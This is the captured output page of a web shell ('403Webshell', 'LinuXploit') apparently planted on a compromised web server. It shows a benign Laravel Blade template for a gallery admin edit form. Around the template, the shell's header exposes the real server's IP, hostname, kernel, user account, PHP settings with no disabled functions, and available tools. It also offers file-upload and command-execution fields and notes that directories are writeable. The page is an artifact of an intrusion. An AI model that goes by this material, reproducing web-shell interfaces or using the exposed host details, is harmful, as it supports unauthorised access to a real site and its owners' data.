403Webshell
Server IP : 3.138.164.131  /  Your IP : 216.73.216.136
Web Server : Apache
System : Linux ns1.techtime.me 4.18.0-147.8.1.el8.lve.1.x86_64 #1 SMP Mon Jun 29 09:55:57 EDT 2020 x86_64
User : injazaat ( 1471)
PHP Version : 8.1.20
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home/injazaat/public_html/resources/views/admin/gallery_managment/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /home/injazaat/public_html/resources/views/admin/gallery_managment/update.blade.php
@extends('admin.adminlayouts.adminlayout')
@section('contant')
			<!-- Page Wrapper -->
			<div class="page-wrapper">
				<div class="content container-fluid">

					<!-- Page Header -->
					<div class="page-header">
						<div class="row">
							<div class="col-sm-12">
                                <span><h3 class="page-title"><a href="{{ route('show-gallery') }}"> Customer Support ></a>Edit Support</h3>

</span>

							</div>
						</div>
					</div>
					<!-- /Page Header -->

					<div class="row">
						<div class="col-md-12">
							<div class="card">
								<div class="card-body">
                                  @if (count($errors) > 0)
                            <div class="alert alert-danger">
                                @foreach ($errors->all() as $e)
                             <p>{{ $e }}</p>
                                @endforeach
                            </div>
                              @endif
									<form action="{{ route('edit-gallery-process',$gallery->id) }}" method="post" enctype="multipart/form-data">
                                        @csrf
										<div class="row">

											<div class="col-md-6">
												<div class="form-group">
													<label>title en</label>
													<input type="text" name="title" value="{{ old('title', $gallery->title) }}" class="form-control" >
												</div>
											</div>
                      <div class="col-md-6">
												<div class="form-group">
													<label>title ar</label>
													<input type="text" name="title_ar" value="{{ old('title_ar', $gallery->title_ar) }}" class="form-control" >
												</div>
											</div>
											<div class="col-md-12">
												<div class="form-group">
													<label>Priority</label>
													<input type="text" name="priority" value="{{ old('priority',$gallery->priority) }}" class="form-control" >
												</div>
											</div>
                      <div class="col-md-6">
                          <div class="form-group">
                              <label>description en</label>
                              <textarea type="text"  name="description" class="form-control" rows="5" >{{ old('description',$gallery->description) }} </textarea>
                          </div>
                      </div>
		                  <div class="col-md-6">
		                      <div class="form-group">
		                          <label>description ar</label>
		                          <textarea type="text"  name="description_ar" class="form-control" rows="5" >{{ old('description_ar',$gallery->description_ar) }} </textarea>
		                      </div>
		                  </div>

                      <div class="col-md-12">
                          <img src="{{ asset($gallery->picture) }}" class="img-fluid" id="img" style="max-width:300px;max-height:300px">
                      </div>

                      <div class="col-md-12">
												<div class="form-group">
													<label>Image</label>
													<input type="file"  name="image" accept = 'image/jpeg , image/jpg, image/gif, image/png' class="form-control" id="upload">
												</div>
											</div>


										</div>
                                        <div class="text-right mt-4">
											<button type="submit" name="" class="btn btn-primary">Update </button>
										</div>
									</form>


								</div>
							</div>
						</div>
					</div>
				</div>
			</div>
			<!-- /Page Wrapper -->

@endsection

Youez - 2016 - github.com/yon3zu
LinuXploit